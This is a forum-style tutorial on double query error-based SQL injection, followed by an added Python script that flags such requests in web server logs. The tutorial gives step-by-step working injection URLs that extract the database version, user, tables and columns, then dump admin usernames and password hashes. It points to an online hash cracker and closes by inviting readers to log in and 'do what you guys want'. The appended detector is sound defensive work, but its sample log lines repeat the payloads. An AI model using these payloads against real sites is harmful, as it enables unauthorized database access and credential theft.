SQL injection [Double Query Error Based]
This tutorial is about how to hack a website through double query error-based SQL injection.
For this, you first need a vulnerable site.
OK, after getting a vulnerable site, you get the column count as normal.
Suppose it has 4 columns, so your next command will be:
Code:
www.vulnsite.com/index.php?id=-12 union select 1,2,3,4--
But when you press Enter, it gives an error.
The error is:
Code:
(select statement have different numbers of column)
So now what?
Don't be confused; it's time to use double query SQL injection.
Your command will look like this:
Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(version())+from+information_schema.tables+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)
And the result will look like this:
Code:
"Duplicate entry '5.0.92-community-log1' for key 1"
So here '5.0.92-community-log1' is the site's version (the trailing 1 is the floor(Rand(0)*2) value that the query concatenates onto it).
Now we have to find the site's current_user, so our command will be:
Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(current_user())+from+information_schema.tables+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)
result
Code:
"Duplicate entry user+1' for key 1"
OK, now we will find tables with this command:
Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(table_name)+from+information_schema.tables+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)
result should be
Code:
"duplicate entry 'table_name1' for key 1'
Now keep increasing the limit; you can find it in this part of the command:
Code:
((table_name)+from+information_schema.tables+limit+0,1) )
Here, change the limit '0,1' to 1,1, then 2,1, until you get the error.
OK, now we will find the tables that contain the data, so our command will be:
Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)
result
Code:
"duplicate entry tablename1' for key 1"
So here again, increase the limit's value until you get a table like user, admin, login, etc.
OK, now suppose we have the table name "user", so the next step is to find the columns of this table. Our command will be:
Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(column_name)+from+information_schema.columns+where+table_name=<hex value of table>+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)
result
Code:
"Duplicate entry 'column name1' for key 1'
You can change text to hex here: http://www.swingnote.com/tools/texttohex.php
Again, keep changing the limit's value until you get columns like username, password, etc.
OK, now we have the columns username and password and we need the data inside the columns, so our command will be:
Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(username,0x3a,password)+from+user+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)
result
Code:
"Duplicate entry 'Admin:452875204827e1f25994a3da414587125' for key 1"
If the password is hashed, then you have to crack that hash.
You can crack that hash with a site, namely:
Code:
http://md5decrypter.co.uk
So you can crack the hash.
So you got the user and pass; log in, do what you guys want, and enjoy.
POSTED BY PATTAKHA MUNDA
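
Every request in the tutorial above carries the same count(*) / floor(Rand(0)*2) / group by trio, which makes the technique easy to spot in web server access logs. The following Python is an added example, not part of the original post: it flags such requests and reports what the inner subquery tried to read, assuming combined-format access logs; the function names, log lines and IP addresses are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# The three pieces every payload in the tutorial shares, matched after decoding.
FLOOR_RAND = re.compile(r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)")
COUNT_STAR = re.compile(r"count\s*\(\s*\*\s*\)")
GROUP_BY = re.compile(r"group\s+by\b")
# Inner subquery: shows what the request tried to read and at which LIMIT offset.
INNER = re.compile(r"concat\s*\(\s*\(\s*select\s+(.+?)\s+limit\s+(\d+)\s*,\s*\d+\s*\)")
REQUEST = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+"')

def normalize(query):
    """URL-decode (at most 3 rounds, for proxies that re-encode), lowercase, squeeze spaces."""
    for _ in range(3):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return re.sub(r"\s+", " ", query).lower()

def inspect_query(query):
    """Return None for a clean query string, else what the payload tried to read."""
    q = normalize(query)
    if not (FLOOR_RAND.search(q) and COUNT_STAR.search(q) and GROUP_BY.search(q)):
        return None
    inner = INNER.search(q)
    return {"read": inner.group(1) if inner else "unknown",
            "offset": int(inner.group(2)) if inner else None}

def scan(lines):
    """Return (line number, client, read target, LIMIT offset) for each flagged request."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        found = inspect_query(urlsplit(m.group(2)).query) if m else None
        if found:
            hits.append((n, m.group(1), found["read"], found["offset"]))
    return hits

# Constructed access-log lines (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?id=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:02:11 +0000] "GET /index.php?id=-12+and+(select+1+from(select%20count(*),concat((select+concat(version())+from+information_schema.tables+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b) HTTP/1.1" 200 311',
    '203.0.113.9 - - [01/Jan/2024:10:09:40 +0000] "GET /index.php?id=-12%20and%20%28select%201%20from%28select%20count%28*%29%2Cconcat%28%28select%20concat%28username%2C0x3a%2Cpassword%29%20from%20user%20limit%203%2C1%29%2Cfloor%28Rand%280%29*2%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29 HTTP/1.1" 200 322',
    '198.51.100.4 - - [01/Jan/2024:10:15:02 +0000] "GET /search.php?q=count(*)+group+by+examples HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A hit means the request reached the server, not that it returned data: the technique only works when the application echoes the MySQL error into the page, so check whether error display was enabled. The "read" and "offset" fields show how far the enumeration got, which helps scope what may have been exposed.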